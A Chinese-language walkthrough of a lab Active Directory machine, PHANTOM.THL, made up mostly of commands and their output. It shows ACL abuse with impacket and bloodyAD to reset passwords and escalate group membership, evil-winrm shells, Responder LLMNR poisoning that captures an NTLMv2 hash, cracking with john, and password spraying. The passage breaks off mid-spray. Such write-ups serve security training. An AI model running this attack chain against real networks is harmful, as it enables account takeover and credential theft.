默认的用户凭证
username: mark
password: suP3rPa$sw0rd2026!&
Nmap
[/home/kali/temp]$ nmap 192.168.56.100 -A -p-
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-07-13 12:20:55Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: PHANTOM.THL0., Site: Default-First-Site-Name)
|_ssl-date: 2026-07-13T12:22:27+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=DC01.PHANTOM.THL
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.PHANTOM.THL
| Not valid before: 2026-02-21T23:24:38
|_Not valid after: 2027-02-21T23:24:38
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: PHANTOM.THL0., Site: Default-First-Site-Name)
|_ssl-date: 2026-07-13T12:22:27+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=DC01.PHANTOM.THL
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.PHANTOM.THL
| Not valid before: 2026-02-21T23:24:38
|_Not valid after: 2027-02-21T23:24:38
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: PHANTOM.THL0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.PHANTOM.THL
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.PHANTOM.THL
| Not valid before: 2026-02-21T23:24:38
|_Not valid after: 2027-02-21T23:24:38
|_ssl-date: 2026-07-13T12:22:27+00:00; 0s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: PHANTOM.THL0., Site: Default-First-Site-Name)
|_ssl-date: 2026-07-13T12:22:27+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=DC01.PHANTOM.THL
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.PHANTOM.THL
| Not valid before: 2026-02-21T23:24:38
|_Not valid after: 2027-02-21T23:24:38
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49664/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
57796/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
57797/tcp open msrpc Microsoft Windows RPC
57808/tcp open msrpc Microsoft Windows RPC
57817/tcp open msrpc Microsoft Windows RPC
57831/tcp open msrpc Microsoft Windows RPC
MAC Address: 08:00:27:B2:9C:C3 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2022|11|2016 (97%)
OS CPE: cpe:/o:microsoft:windows_server_2022 cpe:/o:microsoft:windows_11 cpe:/o:microsoft:windows_server_2016
Aggressive OS guesses: Microsoft Windows Server 2022 (97%), Microsoft Windows 11 21H2 (91%), Microsoft Windows Server 2016 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2026-07-13T12:21:47
|_ start_date: N/A
|_nbstat: NetBIOS name: DC01, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:b2:9c:c3 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
TRACEROUTE
HOP RTT ADDRESS
1 0.41 ms 192.168.56.100
修改 /etc/hosts 如下
[/home/kali/temp]$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 Hacking
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
192.168.56.100 PHANTOM.THL DC01.PHANTOM.THL
UserEnum
[/home/kali/temp]$ crackmapexec smb 192.168.56.100 -u mark -p 'suP3rPa$sw0rd2026!&' --users
SMB 192.168.56.100 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:PHANTOM.THL) (signing:True) (SMBv1:False)
SMB 192.168.56.100 445 DC01 [+] PHANTOM.THL\mark:suP3rPa$sw0rd2026!&
SMB 192.168.56.100 445 DC01 [+] Enumerated domain user(s)
SMB 192.168.56.100 445 DC01 PHANTOM.THL\LegacyAdmins badpwdcount: 0 desc: Legacy administrative group maintained for backward compatibility with older systems.
SMB 192.168.56.100 445 DC01 PHANTOM.THL\robert badpwdcount: 0 desc:
SMB 192.168.56.100 445 DC01 PHANTOM.THL\tomas badpwdcount: 0 desc:
SMB 192.168.56.100 445 DC01 PHANTOM.THL\frank badpwdcount: 0 desc:
SMB 192.168.56.100 445 DC01 PHANTOM.THL\joshua badpwdcount: 0 desc:
SMB 192.168.56.100 445 DC01 PHANTOM.THL\ian badpwdcount: 0 desc:
SMB 192.168.56.100 445 DC01 PHANTOM.THL\michael badpwdcount: 0 desc:
SMB 192.168.56.100 445 DC01 PHANTOM.THL\ana badpwdcount: 0 desc:
SMB 192.168.56.100 445 DC01 PHANTOM.THL\maria badpwdcount: 0 desc:
SMB 192.168.56.100 445 DC01 PHANTOM.THL\sandra badpwdcount: 0 desc:
SMB 192.168.56.100 445 DC01 PHANTOM.THL\mia badpwdcount: 0 desc:
SMB 192.168.56.100 445 DC01 PHANTOM.THL\joe badpwdcount: 0 desc:
SMB 192.168.56.100 445 DC01 PHANTOM.THL\bob badpwdcount: 0 desc:
SMB 192.168.56.100 445 DC01 PHANTOM.THL\mark badpwdcount: 0 desc:
SMB 192.168.56.100 445 DC01 PHANTOM.THL\krbtgt badpwdcount: 0 desc: Cuenta de servicio de centro de distribución de claves
SMB 192.168.56.100 445 DC01 PHANTOM.THL\Invitado badpwdcount: 0 desc: Cuenta integrada para el acceso como invitado al equipo o dominio
SMB 192.168.56.100 445 DC01 PHANTOM.THL\Administrador badpwdcount: 0 desc: Cuenta integrada para la administración del equipo o dominio
Bloodhound
[/home/kali/temp]$ bloodhound-python -d phantom.thl -u mark -p 'suP3rPa$sw0rd2026!&' -dc dc01.phantom.thl -c All -ns 192.168.56.100 --zip
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: phantom.thl
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.phantom.thl
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.phantom.thl
INFO: Found 18 users
INFO: Found 60 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC01.PHANTOM.THL
INFO: Done in 00M 00S
INFO: Compressing output into 20260713202940_bloodhound.zip
WriteOwner - Fullcontrol User(bob)
查看到 mark 用户可以 WriteOwner 到 bob 用户
[/home/kali/temp]$ impacket-owneredit -action write -new-owner 'mark' -target 'bob' 'phantom.thl/mark:suP3rPa$sw0rd2026!&'
/usr/share/doc/python3-impacket/examples/owneredit.py:87: SyntaxWarning: invalid escape sequence '\V'
'S-1-5-83-0': 'NT VIRTUAL MACHINE\Virtual Machines',
/usr/share/doc/python3-impacket/examples/owneredit.py:96: SyntaxWarning: invalid escape sequence '\P'
'S-1-5-32-554': 'BUILTIN\Pre-Windows 2000 Compatible Access',
/usr/share/doc/python3-impacket/examples/owneredit.py:97: SyntaxWarning: invalid escape sequence '\R'
'S-1-5-32-555': 'BUILTIN\Remote Desktop Users',
/usr/share/doc/python3-impacket/examples/owneredit.py:98: SyntaxWarning: invalid escape sequence '\I'
'S-1-5-32-557': 'BUILTIN\Incoming Forest Trust Builders',
/usr/share/doc/python3-impacket/examples/owneredit.py:100: SyntaxWarning: invalid escape sequence '\P'
'S-1-5-32-558': 'BUILTIN\Performance Monitor Users',
/usr/share/doc/python3-impacket/examples/owneredit.py:101: SyntaxWarning: invalid escape sequence '\P'
'S-1-5-32-559': 'BUILTIN\Performance Log Users',
/usr/share/doc/python3-impacket/examples/owneredit.py:102: SyntaxWarning: invalid escape sequence '\W'
'S-1-5-32-560': 'BUILTIN\Windows Authorization Access Group',
/usr/share/doc/python3-impacket/examples/owneredit.py:103: SyntaxWarning: invalid escape sequence '\T'
'S-1-5-32-561': 'BUILTIN\Terminal Server License Servers',
/usr/share/doc/python3-impacket/examples/owneredit.py:104: SyntaxWarning: invalid escape sequence '\D'
'S-1-5-32-562': 'BUILTIN\Distributed COM Users',
/usr/share/doc/python3-impacket/examples/owneredit.py:105: SyntaxWarning: invalid escape sequence '\C'
'S-1-5-32-569': 'BUILTIN\Cryptographic Operators',
/usr/share/doc/python3-impacket/examples/owneredit.py:106: SyntaxWarning: invalid escape sequence '\E'
'S-1-5-32-573': 'BUILTIN\Event Log Readers',
/usr/share/doc/python3-impacket/examples/owneredit.py:107: SyntaxWarning: invalid escape sequence '\C'
'S-1-5-32-574': 'BUILTIN\Certificate Service DCOM Access',
/usr/share/doc/python3-impacket/examples/owneredit.py:108: SyntaxWarning: invalid escape sequence '\R'
'S-1-5-32-575': 'BUILTIN\RDS Remote Access Servers',
/usr/share/doc/python3-impacket/examples/owneredit.py:109: SyntaxWarning: invalid escape sequence '\R'
'S-1-5-32-576': 'BUILTIN\RDS Endpoint Servers',
/usr/share/doc/python3-impacket/examples/owneredit.py:110: SyntaxWarning: invalid escape sequence '\R'
'S-1-5-32-577': 'BUILTIN\RDS Management Servers',
/usr/share/doc/python3-impacket/examples/owneredit.py:111: SyntaxWarning: invalid escape sequence '\H'
'S-1-5-32-578': 'BUILTIN\Hyper-V Administrators',
/usr/share/doc/python3-impacket/examples/owneredit.py:112: SyntaxWarning: invalid escape sequence '\A'
'S-1-5-32-579': 'BUILTIN\Access Control Assistance Operators',
/usr/share/doc/python3-impacket/examples/owneredit.py:113: SyntaxWarning: invalid escape sequence '\R'
'S-1-5-32-580': 'BUILTIN\Remote Management Users',
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Current owner information below
[*] - SID: S-1-5-21-3580157585-956322742-780763674-1103
[*] - sAMAccountName: mark
[*] - distinguishedName: CN=Mark,CN=Users,DC=PHANTOM,DC=THL
[*] OwnerSid modified successfully!
[/home/kali/temp]$ imagetops
[/home/kali/temp]$ impacket-dacledit -action 'write' -rights 'FullControl' -principal 'mark' -target 'bob' 'phantom.thl/mark:suP3rPa$sw0rd2026!&'
/usr/share/doc/python3-impacket/examples/dacledit.py:101: SyntaxWarning: invalid escape sequence '\V'
'S-1-5-83-0': 'NT VIRTUAL MACHINE\Virtual Machines',
/usr/share/doc/python3-impacket/examples/dacledit.py:110: SyntaxWarning: invalid escape sequence '\P'
'S-1-5-32-554': 'BUILTIN\Pre-Windows 2000 Compatible Access',
/usr/share/doc/python3-impacket/examples/dacledit.py:111: SyntaxWarning: invalid escape sequence '\R'
'S-1-5-32-555': 'BUILTIN\Remote Desktop Users',
/usr/share/doc/python3-impacket/examples/dacledit.py:112: SyntaxWarning: invalid escape sequence '\I'
'S-1-5-32-557': 'BUILTIN\Incoming Forest Trust Builders',
/usr/share/doc/python3-impacket/examples/dacledit.py:114: SyntaxWarning: invalid escape sequence '\P'
'S-1-5-32-558': 'BUILTIN\Performance Monitor Users',
/usr/share/doc/python3-impacket/examples/dacledit.py:115: SyntaxWarning: invalid escape sequence '\P'
'S-1-5-32-559': 'BUILTIN\Performance Log Users',
/usr/share/doc/python3-impacket/examples/dacledit.py:116: SyntaxWarning: invalid escape sequence '\W'
'S-1-5-32-560': 'BUILTIN\Windows Authorization Access Group',
/usr/share/doc/python3-impacket/examples/dacledit.py:117: SyntaxWarning: invalid escape sequence '\T'
'S-1-5-32-561': 'BUILTIN\Terminal Server License Servers',
/usr/share/doc/python3-impacket/examples/dacledit.py:118: SyntaxWarning: invalid escape sequence '\D'
'S-1-5-32-562': 'BUILTIN\Distributed COM Users',
/usr/share/doc/python3-impacket/examples/dacledit.py:119: SyntaxWarning: invalid escape sequence '\C'
'S-1-5-32-569': 'BUILTIN\Cryptographic Operators',
/usr/share/doc/python3-impacket/examples/dacledit.py:120: SyntaxWarning: invalid escape sequence '\E'
'S-1-5-32-573': 'BUILTIN\Event Log Readers',
/usr/share/doc/python3-impacket/examples/dacledit.py:121: SyntaxWarning: invalid escape sequence '\C'
'S-1-5-32-574': 'BUILTIN\Certificate Service DCOM Access',
/usr/share/doc/python3-impacket/examples/dacledit.py:122: SyntaxWarning: invalid escape sequence '\R'
'S-1-5-32-575': 'BUILTIN\RDS Remote Access Servers',
/usr/share/doc/python3-impacket/examples/dacledit.py:123: SyntaxWarning: invalid escape sequence '\R'
'S-1-5-32-576': 'BUILTIN\RDS Endpoint Servers',
/usr/share/doc/python3-impacket/examples/dacledit.py:124: SyntaxWarning: invalid escape sequence '\R'
'S-1-5-32-577': 'BUILTIN\RDS Management Servers',
/usr/share/doc/python3-impacket/examples/dacledit.py:125: SyntaxWarning: invalid escape sequence '\H'
'S-1-5-32-578': 'BUILTIN\Hyper-V Administrators',
/usr/share/doc/python3-impacket/examples/dacledit.py:126: SyntaxWarning: invalid escape sequence '\A'
'S-1-5-32-579': 'BUILTIN\Access Control Assistance Operators',
/usr/share/doc/python3-impacket/examples/dacledit.py:127: SyntaxWarning: invalid escape sequence '\R'
'S-1-5-32-580': 'BUILTIN\Remote Management Users',
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] DACL backed up to dacledit-20260713-203857.bak
[*] DACL modified successfully!
然后修改 bob 的密码
[/home/kali/temp]$ bloodyAD --dc 192.168.56.100 -d phantom.thl -u mark -p 'suP3rPa$sw0rd2026!&' set password bob 'Abc123456@'
[+] Password changed successfully!
User(bob) WriteMember
再查看 bob 的权限
将 bob 添加到 IT 组里
[/home/kali/temp]$ bloodyAD --dc 192.168.56.100 -d phantom.thl -u bob -p 'Abc123456@' add groupMember IT bob
[+] bob added to IT
IT 组对 HELPDESK 组具有 WriteDacl 权限,将 bob 用户添加写入 HELPDESK 组用户的权限
[/home/kali/temp]$ impacket-dacledit -action 'write' -rights 'WriteMembers' -principal 'bob' -target-dn 'CN=HELPDESK,CN=USERS,DC=PHANTOM,DC=THL' 'phantom.thl'/'bob:Abc123456@'
/usr/share/doc/python3-impacket/examples/dacledit.py:101: SyntaxWarning: invalid escape sequence '\V'
'S-1-5-83-0': 'NT VIRTUAL MACHINE\Virtual Machines',
/usr/share/doc/python3-impacket/examples/dacledit.py:110: SyntaxWarning: invalid escape sequence '\P'
'S-1-5-32-554': 'BUILTIN\Pre-Windows 2000 Compatible Access',
/usr/share/doc/python3-impacket/examples/dacledit.py:111: SyntaxWarning: invalid escape sequence '\R'
'S-1-5-32-555': 'BUILTIN\Remote Desktop Users',
/usr/share/doc/python3-impacket/examples/dacledit.py:112: SyntaxWarning: invalid escape sequence '\I'
'S-1-5-32-557': 'BUILTIN\Incoming Forest Trust Builders',
/usr/share/doc/python3-impacket/examples/dacledit.py:114: SyntaxWarning: invalid escape sequence '\P'
'S-1-5-32-558': 'BUILTIN\Performance Monitor Users',
/usr/share/doc/python3-impacket/examples/dacledit.py:115: SyntaxWarning: invalid escape sequence '\P'
'S-1-5-32-559': 'BUILTIN\Performance Log Users',
/usr/share/doc/python3-impacket/examples/dacledit.py:116: SyntaxWarning: invalid escape sequence '\W'
'S-1-5-32-560': 'BUILTIN\Windows Authorization Access Group',
/usr/share/doc/python3-impacket/examples/dacledit.py:117: SyntaxWarning: invalid escape sequence '\T'
'S-1-5-32-561': 'BUILTIN\Terminal Server License Servers',
/usr/share/doc/python3-impacket/examples/dacledit.py:118: SyntaxWarning: invalid escape sequence '\D'
'S-1-5-32-562': 'BUILTIN\Distributed COM Users',
/usr/share/doc/python3-impacket/examples/dacledit.py:119: SyntaxWarning: invalid escape sequence '\C'
'S-1-5-32-569': 'BUILTIN\Cryptographic Operators',
/usr/share/doc/python3-impacket/examples/dacledit.py:120: SyntaxWarning: invalid escape sequence '\E'
'S-1-5-32-573': 'BUILTIN\Event Log Readers',
/usr/share/doc/python3-impacket/examples/dacledit.py:121: SyntaxWarning: invalid escape sequence '\C'
'S-1-5-32-574': 'BUILTIN\Certificate Service DCOM Access',
/usr/share/doc/python3-impacket/examples/dacledit.py:122: SyntaxWarning: invalid escape sequence '\R'
'S-1-5-32-575': 'BUILTIN\RDS Remote Access Servers',
/usr/share/doc/python3-impacket/examples/dacledit.py:123: SyntaxWarning: invalid escape sequence '\R'
'S-1-5-32-576': 'BUILTIN\RDS Endpoint Servers',
/usr/share/doc/python3-impacket/examples/dacledit.py:124: SyntaxWarning: invalid escape sequence '\R'
'S-1-5-32-577': 'BUILTIN\RDS Management Servers',
/usr/share/doc/python3-impacket/examples/dacledit.py:125: SyntaxWarning: invalid escape sequence '\H'
'S-1-5-32-578': 'BUILTIN\Hyper-V Administrators',
/usr/share/doc/python3-impacket/examples/dacledit.py:126: SyntaxWarning: invalid escape sequence '\A'
'S-1-5-32-579': 'BUILTIN\Access Control Assistance Operators',
/usr/share/doc/python3-impacket/examples/dacledit.py:127: SyntaxWarning: invalid escape sequence '\R'
'S-1-5-32-580': 'BUILTIN\Remote Management Users',
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] DACL backed up to dacledit-20260713-204430.bak
[*] DACL modified successfully!
然后添加到组里面
[/home/kali/temp]$ bloodyAD --dc 192.168.56.100 -d phantom.thl -u bob -p 'Abc123456@' add groupMember HELPDESK bob
[+] bob added to HELPDESK
ForceChangePassword - User(frank)
[/home/kali/temp]$ bloodyAD --dc 192.168.56.100 -d phantom.thl -u bob -p 'Abc123456@' set password frank 'Abc123456@'
[+] Password changed successfully!
由于 frank 在远程管理组里,并且 5985 端口开放,可以通过 evil-winrm 连接
[/home/kali/temp]$ evil-winrm -i 192.168.56.100 -u frank -p 'Abc123456@'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\frank\Documents> whoami /all
INFORMACIàN DE USUARIO
----------------------
Nombre de usuario SID
================= ============================================
phantom\frank S-1-5-21-3580157585-956322742-780763674-1113
INFORMACIàN DE GRUPO
--------------------
Nombre de grupo Tipo SID Atributos
================================================================== ============== ============ ========================================================================
Todos Grupo conocido S-1-1-0 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
BUILTIN\Usuarios de administraci¢n remota Alias S-1-5-32-580 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
BUILTIN\Usuarios Alias S-1-5-32-545 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
BUILTIN\Acceso compatible con versiones anteriores de Windows 2000 Alias S-1-5-32-554 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
BUILTIN\Acceso DCOM a Serv. de certif. Alias S-1-5-32-574 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
NT AUTHORITY\NETWORK Grupo conocido S-1-5-2 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
NT AUTHORITY\Usuarios autentificados Grupo conocido S-1-5-11 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
NT AUTHORITY\Esta compa¤¡a Grupo conocido S-1-5-15 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
NT AUTHORITY\Autenticaci¢n NTLM Grupo conocido S-1-5-64-10 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
Etiqueta obligatoria\Nivel obligatorio medio alto Etiqueta S-1-16-8448
INFORMACIàN DE PRIVILEGIOS
--------------------------
Nombre de privilegio Descripci¢n Estado
============================= ============================================ ==========
SeMachineAccountPrivilege Agregar estaciones de trabajo al dominio Habilitada
SeChangeNotifyPrivilege Omitir comprobaci¢n de recorrido Habilitada
SeIncreaseWorkingSetPrivilege Aumentar el espacio de trabajo de un proceso Habilitada
INFORMACIàN DE NOTIFICACIONES DE USUARIO
-----------------------
Notificaciones de usuario desconocidas.
Se ha deshabilitado la compatibilidad de Kerberos para el control de acceso din mico en este dispositivo.
但没有任何有价值的东西
LLMNR Poisoning - Own User(robert)
LLMNR (Link-Local Multicast Name Resolution) 和 NBT-NS (NetBIOS Name Service) 是 Windows 系统的备用名称解析协议:
有以下特点:
- 当 DNS 解析失败时,Windows 会使用 LLMNR/NBT-NS 进行广播查询
- 默认启用在所有 Windows 系统中(包括最新版本)
- 不加密、不认证 → 容易受到中间人攻击
[/home/kali/temp]$ responder -I eth1
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.5.0
To support this project:
Github -> https://github.com/sponsors/lgandx
Paypal -> https://paypal.me/PythonResponder
Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [OFF]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [OFF]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
MQTT server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
SNMP server [OFF]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Force ESS downgrade [OFF]
[+] Generic Options:
Responder NIC [eth1]
Responder IP [192.168.56.4]
Responder IPv6 [fe80::d072:dc0f:641a:5714]
Challenge set [random]
Don't Respond To Names ['ISATAP', 'ISATAP.LOCAL']
Don't Respond To MDNS TLD ['_DOSVC']
TTL for poisoned response [default]
[+] Current Session Variables:
Responder Machine Name [WIN-QIQ7RQESICI]
Responder Domain Name [KZXB.LOCAL]
Responder DCE-RPC Port [45895]
[+] Listening for events...
[*] [NBT-NS] Poisoned answer sent to 192.168.56.100 for name PHANTOM (service: File Server)
[*] [MDNS] Poisoned answer sent to 192.168.56.100 for name PHANTOM.LOCAL
[*] [MDNS] Poisoned answer sent to fe80::5050:b218:7453:4129 for name PHANTOM.LOCAL
[*] [LLMNR] Poisoned answer sent to fe80::5050:b218:7453:4129 for name PHANTOM
[*] [LLMNR] Poisoned answer sent to fe80::5050:b218:7453:4129 for name PHANTOM
[*] [LLMNR] Poisoned answer sent to 192.168.56.100 for name PHANTOM
[*] [MDNS] Poisoned answer sent to fe80::5050:b218:7453:4129 for name PHANTOM.LOCAL
[*] [MDNS] Poisoned answer sent to 192.168.56.100 for name PHANTOM.LOCAL
[*] [LLMNR] Poisoned answer sent to 192.168.56.100 for name PHANTOM
[*] [MDNS] Poisoned answer sent to 192.168.56.100 for name PHANTOM.LOCAL
[*] [LLMNR] Poisoned answer sent to fe80::5050:b218:7453:4129 for name PHANTOM
[*] [MDNS] Poisoned answer sent to fe80::5050:b218:7453:4129 for name PHANTOM.LOCAL
[*] [LLMNR] Poisoned answer sent to fe80::5050:b218:7453:4129 for name PHANTOM
[*] [LLMNR] Poisoned answer sent to 192.168.56.100 for name PHANTOM
[*] [MDNS] Poisoned answer sent to fe80::5050:b218:7453:4129 for name PHANTOM.LOCAL
[*] [MDNS] Poisoned answer sent to 192.168.56.100 for name PHANTOM.LOCAL
[*] [LLMNR] Poisoned answer sent to 192.168.56.100 for name PHANTOM
[SMB] NTLMv2-SSP Client : fe80::5050:b218:7453:4129
[SMB] NTLMv2-SSP Username : PHANTOM.LOCAL\robert
[SMB] NTLMv2-SSP Hash : robert::PHANTOM.LOCAL:b7028a60220b0948:49F4A0F32033C66558E08621AAF69477:010100000000000000EDC95D0D13DD014D44C6564B63C33C00000000020008004B005A005800420001001E00570049004E002D005100490051003700520051004500530049004300490004003400570049004E002D00510049005100370052005100450053004900430049002E004B005A00580042002E004C004F00430041004C00030014004B005A00580042002E004C004F00430041004C00050014004B005A00580042002E004C004F00430041004C000700080000EDC95D0D13DD0106000400020000000800300030000000000000000000000000300000BC501038F82BF7CB19D6AB1C65E3C254308D511DED99ED70AA72DE3B60C62EC30A001000000000000000000000000000000000000900240063006900660073002F005000480041004E0054004F004D002E004C004F00430041004C000000000000000000
[+] Exiting...
尝试爆破一下密码
[/home/kali/temp]$ john hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
bLink182 (robert)
1g 0:00:00:02 DONE (2026-07-13 21:28) 0.3787g/s 3736Kp/s 3736Kc/s 3736KC/s bLueLove..b53017912
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.
得到 robert 用户的密码,登录拿到 user.txt
[/home/kali/temp]$ evil-winrm -i 192.168.56.100 -u robert -p 'bLink182'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\robert\Documents> cd ../desktop
*Evil-WinRM* PS C:\Users\robert\desktop> dir
Directorio: C:\Users\robert\desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 2/22/2026 3:01 AM 33 user.txt
*Evil-WinRM* PS C:\Users\robert\desktop>
Own User(tomas)
在目录下拿到一个留言
*Evil-WinRM* PS C:\Users\robert\Documents> type migration_notes.txt
[OK] Verify application connectivity after the ERP migration
Validate that legacy authentication is still working for internal tools
Review Active Directory group memberships (DevOps / Support)
[OK] Confirm that backup jobs are running correctly
Check access permissions on shared resources
[IMPORTANT] Remember to clean up temporary test accounts created during the migration
Remove unused scripts and obsolete configurations
[OK] Verify expiration and renewal of internal certificates
Document performed steps and lessons learned from the migration
其中重要说的是记得清除临时账户,并且删掉未用过的脚本和配置等。那么找一下被删掉的用户呢
*Evil-WinRM* PS C:\Users\robert\Documents> Get-ADObject -Filter {isDeleted -eq $true -and ObjectClass -eq "user"} -IncludeDeletedObjects -Properties * | Where-Object {$_.Name -like "*test*"} | select Name, SamAccountName, Deleted, LastKnownParent
Name SamAccountName Deleted LastKnownParent
---- -------------- ------- ---------------
dev_test... dev_test True CN=Users,DC=PHANTOM,DC=THL
发现一个 dev_test 用户,查看他的完整信息
*Evil-WinRM* PS C:\Users\robert\Documents> Get-ADObject -Filter {isDeleted -eq $true -and ObjectClass -eq "user"} -IncludeDeletedObjects -Properties * | Where-Object {$_.Name -like "*dev_test*"} | fl *
accountExpires : 9223372036854775807
badPasswordTime : 0
badPwdCount : 0
CanonicalName : PHANTOM.THL/Deleted Objects/dev_test
DEL:55a7bc61-fdc9-4ecc-bec5-25703d9ee855
CN : dev_test
DEL:55a7bc61-fdc9-4ecc-bec5-25703d9ee855
codePage : 0
countryCode : 0
Created : 2/21/2026 6:09:48 PM
createTimeStamp : 2/21/2026 6:09:48 PM
Deleted : True
Description : f6Y%UPa6ZB9eR5wG9$an
DisplayName : dev_test
DistinguishedName : CN=dev_test\0ADEL:55a7bc61-fdc9-4ecc-bec5-25703d9ee855,CN=Deleted Objects,DC=PHANTOM,DC=THL
dSCorePropagationData : {2/21/2026 8:23:32 PM, 1/1/1601 1:00:04 AM}
givenName : dev_test
instanceType : 4
isDeleted : True
LastKnownParent : CN=Users,DC=PHANTOM,DC=THL
lastLogoff : 0
lastLogon : 0
logonCount : 0
Modified : 2/21/2026 7:16:40 PM
modifyTimeStamp : 2/21/2026 7:16:40 PM
msDS-LastKnownRDN : dev_test
Name : dev_test
DEL:55a7bc61-fdc9-4ecc-bec5-25703d9ee855
nTSecurityDescriptor : System.DirectoryServices.ActiveDirectorySecurity
ObjectCategory :
ObjectClass : user
ObjectGUID : 55a7bc61-fdc9-4ecc-bec5-25703d9ee855
objectSid : S-1-5-21-3580157585-956322742-780763674-1114
primaryGroupID : 513
ProtectedFromAccidentalDeletion : False
pwdLastSet : 134161673885023278
sAMAccountName : dev_test
sDRightsEffective : 0
userAccountControl : 66048
userPrincipalName : dev_test@PHANTOM.THL
uSNChanged : 12981
uSNCreated : 12845
whenChanged : 2/21/2026 7:16:40 PM
whenCreated : 2/21/2026 6:09:48 PM
PropertyNames : {accountExpires, badPasswordTime, badPwdCount, CanonicalName...}
AddedProperties : {}
RemovedProperties : {}
ModifiedProperties : {}
PropertyCount : 41
其中的 Description 字符串看起来像一串密码,尝试爆破
[/home/kali/temp]$ crackmapexec smb 192.168.56.100 -u users.txt -p 'f6Y%UPa6ZB9eR5wG9$an'
SMB 192.168.56.100 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:PHANTOM.THL) (signing:True) (SMBv1:False)
SMB 192.168.56.100 445 DC01 [-] PHANTOM.THL\LegacyAdmins:f6Y%UPa6ZB9eR5wG9$an STATUS_LOGON_FAILURE
